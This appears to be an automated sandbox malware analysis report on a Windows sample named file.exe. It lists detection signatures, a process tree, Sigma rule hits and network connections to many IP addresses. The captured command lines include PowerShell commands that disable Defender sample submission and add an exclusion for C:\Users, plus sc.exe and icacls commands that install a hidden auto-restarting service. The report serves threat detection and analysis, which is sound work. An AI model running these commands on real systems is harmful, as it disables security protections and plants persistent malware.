Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1532228
MD5:	d2ecf5f2a271da094867f6dc31b3d60e
SHA1:	b8b7ec24a5c6f1a0ad96e989003516b656256d2e
SHA256:	99a5de18c71cfd7fd32d3f2b5bf4a60a4b2aa41f9bdbafa042693375927d11b1
Tags:	exeuser-Bitsight
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for dropped file

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Connects to many ports of the same IP (likely port scanning)

Contains functionality to hide user accounts

Found Tor onion address

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Modifies Windows Defender protection settings

NDIS Filter Driver detected (likely used to intercept and sniff network traffic)

Sigma detected: Execution from Suspicious Folder

Sigma detected: Potentially Suspicious Malware Callback Communication

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Suspicious New Service Creation

Sigma detected: Suspicious Program Location with Network Connections

AV process strings found (often used to terminate AV products)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Connects to several IPs in different countries

Contains functionality to call native functions

Contains functionality to create new users

Contains functionality to dynamically determine API calls

Contains functionality to enumerate network shares

Contains functionality to enumerate running services

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query network adapater information

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Deletes files inside the Windows folder

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Enables security privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (date check)

Found evasive API chain checking for process token information

Found potential string decryption / allocating functions

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries keyboard layouts

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Uses cacls to modify the permissions of files

Uses code obfuscation techniques (call, push, ret)

Uses taskkill to terminate processes

Classification

Process Tree

System is w10x64

file.exe (PID: 2644 cmdline: "C:\Users\user\Desktop\file.exe" MD5: D2ECF5F2A271DA094867F6DC31B3D60E)

file.exe (PID: 5356 cmdline: C:\Users\user\Desktop\file.exe MD5: D2ECF5F2A271DA094867F6DC31B3D60E)

cmd.exe (PID: 5720 cmdline: "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\frdnii7m0pblld98fxhpnx.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 4616 cmdline: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend" MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 2144 cmdline: powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0" MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 4620 cmdline: powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'" MD5: 04029E121A0CFA5991749937DD22A1D9)

f8ff311483bvmdq2bvv.exe (PID: 5772 cmdline: "C:\Users\user\AppData\Local\Temp\f8ff311483bvmdq2bvv.exe" MD5: 319865D78CC8DF6270E27521B8182BFF)

31yd7ynpdj6jw5vl4xn9qyj7u.exe (PID: 3416 cmdline: "C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exe" MD5: 7D1755E8E41A6C2F08D2FAEFFDF9DAD1)

taskkill.exe (PID: 5588 cmdline: taskkill.exe /F /FI "SERVICES eq RDP-Controller" MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

conhost.exe (PID: 5608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 1916 cmdline: sc.exe stop RDP-Controller MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 5376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 5664 cmdline: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 6088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 4548 cmdline: sc.exe failure RDP-Controller reset= 1 actions= restart/10000 MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 3560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 4620 cmdline: sc.exe start RDP-Controller MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 5692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

icacls.exe (PID: 5200 cmdline: icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18 MD5: 48C87E3B3003A2413D6399EA77707F5D)

conhost.exe (PID: 2156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

icacls.exe (PID: 4952 cmdline: icacls.exe C:\Users\Public /restore C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\95cRhCj4pPDP.acl MD5: 48C87E3B3003A2413D6399EA77707F5D)

conhost.exe (PID: 6720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

main.exe (PID: 5252 cmdline: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe MD5: 4E320E2F46342D6D4657D2ADBF1F22D0)

WerFault.exe (PID: 5832 cmdline: C:\Windows\system32\WerFault.exe -u -p 5252 -s 1184 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

svchost.exe (PID: 5292 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 7148 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

WerFault.exe (PID: 5092 cmdline: C:\Windows\system32\WerFault.exe -pss -s 452 -p 5252 -ip 5252 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

WerFault.exe (PID: 5968 cmdline: C:\Windows\system32\WerFault.exe -pss -s 520 -p 5164 -ip 5164 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

main.exe (PID: 5164 cmdline: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe MD5: 4E320E2F46342D6D4657D2ADBF1F22D0)

WerFault.exe (PID: 5552 cmdline: C:\Windows\system32\WerFault.exe -u -p 5164 -s 1112 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

cleanup

Sigma Signatures

System Summary

Sigma detected: Execution from Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, CommandLine: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, NewProcessName: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, OriginalFileName: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5092, ProcessCommandLine: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, ProcessId: 5252, ProcessName: main.exe

Sigma detected: Potentially Suspicious Malware Callback Communication

Source: Network Connection

Author: Florian Roth (Nextron Systems): Data: DestinationIp: 144.172.118.154, DestinationIsIpv6: false, DestinationPort: 7777, EventID: 3, Image: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, Initiated: true, ProcessId: 5252, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 18608

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", CommandLine: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\frdnii7m0pblld98fxhpnx.bat", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5720, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", ProcessId: 4616, ProcessName: powershell.exe

Sigma detected: Suspicious New Service Creation

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, CommandLine: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exe, ParentProcessId: 3416, ParentProcessName: 31yd7ynpdj6jw5vl4xn9qyj7u.exe, ProcessCommandLine: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, ProcessId: 5664, ProcessName: sc.exe

Sigma detected: Suspicious Program Location with Network Connections

Source: Network Connection

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 95.216.2.172, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, Initiated: true, ProcessId: 5252, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49798

Sigma detected: Powershell Defender Exclusion

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'", CommandLine: powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\frdnii7m0pblld98fxhpnx.bat", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5720, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'", ProcessId: 4620, ProcessName: powershell.exe

Sigma detected: New Service Creation Using Sc.EXE

Source: Process started

Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, CommandLine: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exe, ParentProcessId: 3416, ParentProcessName: 31yd7ynpdj6jw5vl4xn9qyj7u.exe, ProcessCommandLine: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, ProcessId: 5664, ProcessName: sc.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", CommandLine: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\frdnii7m0pblld98fxhpnx.bat", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5720, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", ProcessId: 4616, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, CommandLine: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, ProcessId: 5292, ProcessName: svchost.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for dropped file

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	ReversingLabs: Detection: 66%
Source: C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exe	ReversingLabs: Detection: 41%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exe

Joe Sandbox ML: detected

Source: C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exe

File created: C:\Users\user\AppData\Local\Temp\installer.log

Jump to behavior

Source:	Binary string: RfxVmt.pdb source: 31yd7ynpdj6jw5vl4xn9qyj7u.exe, 0000000B.00000002.2383577490.00007FF7A76CE000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000018.00000002.2874424434.0000021B16782000.00000004.00000020.00020000.00000000.sdmp, LL369bff.24.dr
Source:	Binary string: RfxVmt.pdbGCTL source: 31yd7ynpdj6jw5vl4xn9qyj7u.exe, 0000000B.00000002.2383577490.00007FF7A76CE000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000018.00000002.2874424434.0000021B16782000.00000004.00000020.00020000.00000000.sdmp, LL369bff.24.dr

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 24_2_00007FFDA5576DA3 LocalAlloc,wcsncpy,LookupAccountNameW,GetLastError,GetLastError,LocalAlloc,LookupAccountNameW,LocalFree,GetLastError,ConvertSidToStringSidA,GetLastError,wcslen,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,NetApiBufferFree,NetUserEnum,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,		24_2_00007FFDA5576DA3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 24_2_00007FFDA5576D5F NetApiBufferFree,NetUserEnum,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,		24_2_00007FFDA5576D5F

Source: C:\Users\user\AppData\Local\Temp\f8ff311483bvmdq2bvv.exe	Code function: 6_2_00007FF66EBA3DB3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	6_2_00007FF66EBA3DB3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 24_2_00007FF70CAD47A3 FindNextFileA,_mbscpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	24_2_00007FF70CAD47A3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 24_2_00007FFDA557A083 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	24_2_00007FFDA557A083
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 24_2_00007FFDA55A1883 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	24_2_00007FFDA55A1883
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 24_2_00007FFDA55D5BF3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	24_2_00007FFDA55D5BF3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 24_2_00007FFDA5BA57B3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	24_2_00007FFDA5BA57B3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 24_2_00007FFDAC0F5203 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	24_2_00007FFDAC0F5203
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 24_2_00007FFDAC122FE3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	24_2_00007FFDAC122FE3

Networking

Connects to many ports of the same IP (likely port scanning)

Source: global traffic	TCP traffic: 217.25.231.221 ports 39481,1,3,4,8,9
Source: global traffic	TCP traffic: 73.241.223.246 ports 26731,1,2,3,6,7

Found Tor onion address

Source: 31yd7ynpdj6jw5vl4xn9qyj7u.exe, 0000000B.00000002.2383577490.00007FF7A76CE000.00000004.00000001.01000000.00000007.sdmp	String found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: main.exe	String found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,ht
Source: main.exe, 00000018.00000002.2876686721.00007FFD943A4000.00000002.00000001.01000000.0000000C.sdmp	String found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: main.exe, 00000018.00000002.2875167256.0000021B16BAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: main.exe, 00000018.00000002.2875167256.0000021B16C37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed.onion.im/
Source: main.exe, 00000018.00000002.2874424434.0000021B16782000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: main.exe	String found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,ht
Source: main.exe, 00000022.00000002.3266422424.000002204C8ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: main.exe, 00000022.00000002.3267266152.00007FFD943A4000.00000002.00000001.01000000.0000000C.sdmp	String found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: main.exe, 00000022.00000002.3266422424.000002204C94E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed.onion.im/
Source: main.exe, 00000022.00000002.3266422424.000002204C94E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reseed.onion.im/$

NDIS Filter Driver detected (likely used to intercept and sniff network traffic)

Source: f8ff311483bvmdq2bvv.exe.1.dr

Static PE information: Found NDIS imports: FwpmuserClose0, FwpmuserOpen0, FwpmFilterAdd0, FwpmFilterDeleteByKey0, FwpmFreeMemory0, FwpmProviderAdd0, FwpmProviderCreateEnumHandle0, FwpmProviderDestroyEnumHandle0, FwpmProviderEnum0

Source: unknown

Network traffic detected: IP country count 14

Source: global traffic	TCP traffic: 192.168.2.6:49710 -> 146.70.24.213:1126
Source: global traffic	TCP traffic: 192.168.2.6:49995 -> 89.215.190.170:12167
Source: global traffic	TCP traffic: 192.168.2.6:49996 -> 40.134.93.123:9495
Source: global traffic	TCP traffic: 192.168.2.6:49997 -> 217.25.231.221:39481
Source: global traffic	TCP traffic: 192.168.2.6:49998 -> 46.17.106.104:20235
Source: global traffic	TCP traffic: 192.168.2.6:49999 -> 73.241.223.246:26731
Source: global traffic	TCP traffic: 192.168.2.6:50011 -> 186.128.148.177:11722
Source: global traffic	TCP traffic: 192.168.2.6:50012 -> 174.3.142.31:14150
Source: global traffic	UDP traffic: 192.168.2.6:18608 -> 81.110.100.190:15159
Source: global traffic	UDP traffic: 192.168.2.6:18608 -> 84.229.124.109:23113
Source: global traffic	UDP traffic: 192.168.2.6:18608 -> 64.99.192.91:32790
Source: global traffic	UDP traffic: 192.168.2.6:18608 -> 79.142.69.160:7843
Source: global traffic	UDP traffic: 192.168.2.6:18608 -> 217.233.45.79:23566
Source: global traffic	UDP traffic: 192.168.2.6:18608 -> 173.44.49.91:21921
Source: global traffic	UDP traffic: 192.168.2.6:18608 -> 144.172.118.154:7777
Source: global traffic	UDP traffic: 192.168.2.6:18608 -> 94.180.147.148:28993
Source: global traffic	UDP traffic: 192.168.2.6:18608 -> 51.77.214.98:17376
Source: global traffic	UDP traffic: 192.168.2.6:18608 -> 129.159.76.100:6969
Source: global traffic	UDP traffic: 192.168.2.6:10070 -> 195.16.22.143:27140
Source: global traffic	UDP traffic: 192.168.2.6:10070 -> 5.74.117.69:14003
Source: global traffic	UDP traffic: 192.168.2.6:10070 -> 185.82.126.58:4567
Source: global traffic	UDP traffic: 192.168.2.6:10070 -> 151.242.162.160:15037
Source: global traffic	UDP traffic: 192.168.2.6:10070 -> 38.143.66.87:28511

Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.24.213

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

Code function: 24_2_00007FFDA5575EEA recv,WSAGetLastError,

24_2_00007FFDA5575EEA

